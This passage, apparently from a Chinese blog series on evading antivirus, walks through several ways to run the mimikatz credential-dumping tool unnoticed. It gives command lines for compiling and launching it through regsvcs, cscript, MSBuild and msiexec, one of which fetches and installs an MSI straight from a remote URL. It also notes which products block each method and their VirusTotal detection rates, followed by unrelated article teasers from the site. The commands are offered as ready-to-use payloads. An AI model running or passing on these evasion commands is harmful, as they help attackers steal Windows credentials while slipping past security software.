再cmd执行
C:WindowsMicrosoft.NETFramework 2.0.50727csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:WindowsMicrosoft.NETFramework 2.0.50727 egsvcs.exe katz.exe运行时需要管理员权限,而且360会拦截
放行后可正常执行
virustotal.com上katz.exe查杀率为35/73,略惨。
方法12-JS加载mimikatz(VT查杀率22/59)
参考远控免杀专题(38)-白名单Rundll32.exe执行payload(VT免杀率22-58):https://mp.weixin.qq.com/s/rm**AWC6HmcphozfEZhRGA
这个是大佬已经做好的payload,可以直接进行使用。
用DotNetToJScript实现
https://github.com/tyranid/DotNetToJScriptmimikatz
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.js执行cscript mimikatz.js,360会拦截。
放行后可正常执行
virustotal.com上mimikatz.js查杀率为22/59。
方法13-msiexec加载mimikatz(VT查杀率25/60)
参考远控免杀专题(35)-白名单Msiexec.exe执行payload(VT免杀率27-60):https://mp.weixin.qq.com/s/XPrBK1Yh5ggO-PeK85mqcg
使用Advanced Installer生成msi文件。
远程执行
msiexec.exe /passive /i https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/mimikatz.msi /norestart
本地执行
msiexec /passive /i Mimikatz.msi
virustotal.com上mimikatz.msi查杀率为25/60。
方法14-白名单msbuild.exe加载(VT查杀率4/59)
可参考之前的远控免杀专题(34)-白名单MSBuild.exe执行payload(VT免杀率4-57):https://mp.weixin.qq.com/s/1WEglPXm1Q5n6T-c4OhhXA
下载mimikatz.xml
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/executes-mimikatz.xml执行
C:WindowsMicrosoft.NETFramework64v4.0.30319msbuild.exe executes-mimikatz.xml火绒会预警,360不会
virustotal.com上executes-mimikatz.xml查杀率为4/59。
移动4g网络接入点设置方法... 
1 设计原则 l 实用性 :系统设计根据大楼规划有的放矢,从实际需要出发,注... 
应用背景: 随着科技的进步,人们对于会议室的功能和效率的需求也在不断提... 
问题1:K8S集群服务访问失败? 原因分析 :证书不能被识别,其原因为:自定... 
. 设计原则 l 实用性 :系统设计根据大楼规划有的放矢,从实际需要出发,注... 
7日杀局域网的联机教程步骤图... 
确认wan接口和公网IP 登录锐捷睿易NBR路由器找到,系统首页--接口连接状态确认公网IP 和接口名称 设置端口映射 依次... 
1 设计原则 (一)高可靠性原则 所有的主干和水平均采用双路走线,备有冗余... 
一卡通系统架构示意图 应用背景: 一卡通系统是在满足现代化管理需求前提下... 
1. 需求分析 1.1 无线零售发展概况 最近几年,电商对传统零售的冲击越来越大... 
系统概述: 智能建筑模式的建立本身就是要通过系统集成的手段来实现,通过... 
今天从WiFi连接的原理,再结合代码为大家详细的介绍如何利用python来破解WiFi。 Python真的是无所不能,原因就是因为Python有数目庞大的库,无数的现成的轮子,让你做很多很多应用都非... 
一、模块化数据中心概述 模块化数据中心方案,是当今行业中主流及领先的应... 
工具 一台具有NFC识别功能的手机 一张饭卡 MIFARE Classic Tool_v2.1.0.apk 安装软件... 
0x00 前言 上周五,xray社区公众号发布xray高级版更新公告, 新增 shiro 插件,... 
天清汉马USG防火墙怎么设置端口映射,这里我们以映射smtp端口为例演示。 确认网络IP 登录天清汉马USG防火墙,找到系... 
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用... 
WebGoat8是基于Spring boot框架开发,故意不安全的Web应用程序,旨在教授Web应用程... 
WebGoat8系列文章: 前情回顾 数字观星 Jack Chan(Saturn),再会篇为Java代码审计入... 
网络安全只与大公司和机构有关的时代已经过去了。如今,每个人都可能成为网络攻击的潜在受害者,而不管他们的银行账户的状况和财务资源如何。 重要的是要意识到目前影响技术的... 
MySQL除了自身带有的审计功能外,还存在着一些其它的审计插件。 虽然遇到这... 
渗透 测试自动化是白帽子和各家公司一直在解决的一个课题,BurpSuit是渗透测... 
局域网共享设置权限server2012r2文件共享权限设置方法... 
系列文章: 内网 渗透 测试:隐藏通讯隧道技术(上) 什么是隧道? 在实际... 
近期收到一些装修业主吐槽电工的网络知识(网络确实不是电工和设计师的专长)。错误的网络布置方案成本过高,性能不佳,用着还不稳定、不方便。这里统一提供合理高效的解决方... 
今天分享的Writeup是作者在目标网站漏洞测试中发现的一种简单的人机身份验... 
bypass disable function 是否遇到过费劲九牛二虎之力拿了webshell,却发现连个sca... 
用电脑无法打开手机网站怎么办... 
1、补码的特点 补码、移码的0表示惟一。在计算机系统中,数值一律用补码来... 
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用... 
教你轻松解决Win7系统经常获取不到IP地址问题... 
上一章讲到 邮件服务器的搭建和使用 ,那么这章就具体讲解利用方式。 在大... 
最近在刷CTF的题,遇到一道使用HDwiki5.1作为背景的Web题目,解题思路是利用... 
周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。 不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被... 
呼叫转移设置网络异常怎么办... 
a)应启用安全审计功能,审计覆盖到每个用户,对重要的用户行为和重要安全... 
本篇文章主要介绍WAF的一些基本原理,总结常见的SQL注入Bypass WAF技巧。WAF是... 
a)应启用安全审计功能,审计覆盖到每个用户,对重要的用户行为和重要安全... 
根据现有检测机制,来对服务器进行隐藏,增加c2服务器被检测到的几率。... 
前言 我们辛辛苦苦拿到的 Webshell 居然tmd无法执行系统命令: 多半是disable_... 
如何打开Edge浏览器的数据库文件... 
最近在学习代码审计,就想着拿个CMS来练练手,然后选择了MetInfo5.3.19,来一... 
前言: 各位FreeBuf观众的姥爷大家好,我是艾登——皮尔斯(玩看门狗时候注册... 
1、文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何... 
在开始菜单中选择 运行 或者 win+r 同时按呼出运行 输入 gpedit.Msc 呼出本地策略组编辑器 双击计算机配置 Windows设置 安全设置 IP安全策略 右键空白处,选择 创建IP策略 根据指示点击 下... 
很久之前就想总结一篇SQL注入及其更深一层的 渗透 方面的笔记了,奈何一是... 
国产浏览器往往基于Chrome浏览器开发,在带来新功能的情况下也带来了新的安... 
最近在准备找工作,有一家公司给我发来了这样一条消息,于是有了这篇文章... 
无线网络的概念是什么... 
使用 Shell 脚本在 Linux 服务器上能够控制、毁坏或者获取任何东西,通过一些巧妙的攻击方法黑客可能会获取巨大的价值,但大多数攻击也留下踪迹。当然,这些踪迹也可通过 Shell 脚本...